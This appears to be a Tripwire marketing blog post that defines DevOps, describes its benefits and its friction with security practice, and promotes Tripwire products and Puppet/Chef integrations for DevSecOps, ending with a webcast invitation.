Image

DevOps: A Working Definition
So, what do we mean by “DevOps”? The name itself implies a combination of “development” and “operations,” but it involves a lot more than just sticking two departments together under one umbrella. It is a culture and process that has a lot in common with Agile, only even more extreme in some ways. Instead of a release schedule measured in months or weeks, a DevOps team may release a new version 10, 50, 100, or more times every single day, with the developers that write the code deploying their own code directly to production. This is made possible by automating every step of the release pipeline. DevOps teams rely on a variety of tools to help them deploy code faster, and in many cases, they write or extend these tools themselves. Continuous integration tools like Jenkins ensure that every code change results in a completely new product build. Various unit tests and acceptance tests can be run against the new build to verify that no regressions exist in the new build that would cause problems in production. Configuration management tools like Puppet and Chef allow you to define your server infrastructure as code, so that new servers can be provisioned in minutes instead of days. Performance statistics and the results of experimental A/B tests on users are used as feedback for the next round of improvements, and the cycle begins all over again.Image

Benefits of DevOps
One of the most obvious benefits is that your features make it to market faster. Rather than waiting for a scheduled release six months in advance, a new feature can be deployed the day that development on it is finished. So with all else being equal, a company using a DevOps approach could always be six months ahead of a competitor that is not. After all, nothing makes a customer happier than having more features faster, and most developers are happier working with the latest tools and techniques anyway. According to the Puppet 2017 State of DevOps Report, the highest performing DevOps teams surveyed had a rate of failures caused by changes five times lower than the average. And when there was a failure resulting in downtime, the teams were 96 times faster at recovering from that failure. It seems counterintuitive, but moving fast and breaking things eventually leads to a lot less failure and downtime.Coupling DevOps and Security
So, how does security fit into all this? You may have noticed that there isn’t a “security” stage in the DevOps process, and it isn’t one of the guiding principles or techniques usually mentioned in the context of DevOps. If you think that the idea of DevOps would give your IT operations team heartburn, try talking to your IT security team about it. (You might want to make sure they’re sitting down first and that there are no sharp objects nearby.) A DevOps workflow does not leave room for the extended planning and auditing that normally goes along with security operations. You cannot deploy 50 times a day if you have to wait for 50 meetings of a change advisory board to approve the change. Stopping for approval or auditing breaks the cycle, and it prevents the rapid improvement that leads to all of the positive effects of DevOps. In a 2017 DevSecOps Community survey, more than half of respondents either somewhat or strongly agreed that “security is an inhibitor to DevOps agility.” So, if we can’t have both security and DevOps agility, it seems like we have to give one of them up. We can either have our rapid DevOps improvement and give up security considerations, or we can refuse to compromise our security standards but miss out on all the benefits of DevOps.Image

Image

Image

How Tripwire Can Help
If you are going to implement DevSecOps, then Tripwire would like to be part of your solution. An important part of DevSecOps tools is the ability to use product APIs to be able to automate your security assessments as part of your workflow. Many of Tripwire's products also have command-line tools which can make it easier to interact with the APIs instead of writing your own tools. You can also engage our professional services team to help if you don’t want to do all of the integrations yourself. Tripwire Enterprise can be used to monitor your critical DevOps infrastructure servers and evaluate them for compliance with hardened security standards. It can also monitor critical files like the scripts on Puppet and Chef servers. Tripwire Enterprise and Tripwire IP360 can be used to evaluate the security posture of systems before they go to production and continue to monitor them for deviations after. At the same time, Tripwire Log Center can be used to alert on suspicious security events, like a terminated employee logging in and modifying files. Another specific way that Tripwire integrates with DevSecOps is through Puppet and Chef. We have Puppet modules and Chef cookbooks for deploying and managing Tripwire Enterprise agents. These can allow you to install, configure, or upgrade agents automatically across your entire infrastructure at once. They can manage both the legacy Java-based Tripwire Enterprise agent and the next generation Axon agent; they can even help migrate your environment from one kind of agent to another. They are available now on the Puppet Forge and Chef Supermarket, and the source code is also available on GitHub under an open-source license.Recapping DevSecOps
There are a lot of advantages to taking a DevOps approach, from faster time to market to more flexibility and resiliency. By integrating security into every stage of DevOps from the beginning, it’s possible to get the advantages of DevOps without sacrificing your organization’s security. If you have a favorite DevOps tool that you would like to see Tripwire integrate with better, please let us know in the comments. If you’re already using DevOps tools, I hope this gave you some ideas of how Tripwire can work with your tools and process. Also, Tripwire is hosting a special webcast on August 21 titled, "Leading a DevOps Transformation". Join us and guest presenters to learn how to help your organization achieve higher levels of performance whilst ensuring security is a continuous aspect of the process. You can register here or click on the image below!Image
